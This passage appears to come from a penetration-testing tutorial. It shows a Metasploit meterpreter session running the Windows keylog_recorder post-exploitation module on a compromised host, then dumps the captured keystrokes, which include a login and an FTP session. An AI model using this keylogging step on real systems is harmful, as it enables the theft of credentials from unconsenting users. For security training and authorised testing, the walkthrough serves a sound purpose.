Windows Post Capture Modules


The “keylog_recorder” post module captures keystrokes on the compromised system. Before capturing keystrokes, make sure you have migrated to an interactive process.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter >

After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.

root@kali:~# cat /root/.msf4/loot/
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root  s3cr3t
ftp ftp.micro  anonymous  anon@ano  e  quit